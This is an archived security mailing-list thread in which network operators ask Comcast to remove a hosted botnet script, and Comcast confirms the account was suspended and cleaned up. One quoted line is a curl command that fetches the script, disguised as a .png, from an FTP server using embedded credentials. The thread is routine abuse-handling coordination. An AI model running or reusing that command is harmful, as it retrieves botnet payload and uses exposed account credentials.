[nsp-sec] Comcast - please remove botnet script

Griffiths, Chris Chris_Griffiths at Cable.Comcast.com
Sat Mar 23 18:43:43 EDT 2013


On Mar 22, 2013, at 13:34, "Griffiths, Chris" <Chris_Griffiths at Cable.Comcast.com<mailto:Chris_Griffiths at Cable.Comcast.com>> wrote:

On Mar 22, 2013, at 1:16 PM, Andy Davidson <andy at lonap.net<mailto:andy at lonap.net>>
 wrote:

On 22/03/2013 16:42, "Griffiths, Chris"
<Chris_Griffiths at Cable.Comcast.com<mailto:Chris_Griffiths at Cable.Comcast.com>> wrote:


curl ftp://kuhnhunter:kuhndog@home.comcast.net/apache_32.png
Do you know if this was handled?  If not, I will get this handled today.

Hi, Chris --

The script is still online now..


I'll have it taken down now and advise when completed

As a follow-up, the account was temporarily suspended and files were cleaned up and we are working with our customer on remediation.

Thanks



More information about the nsp-security mailing list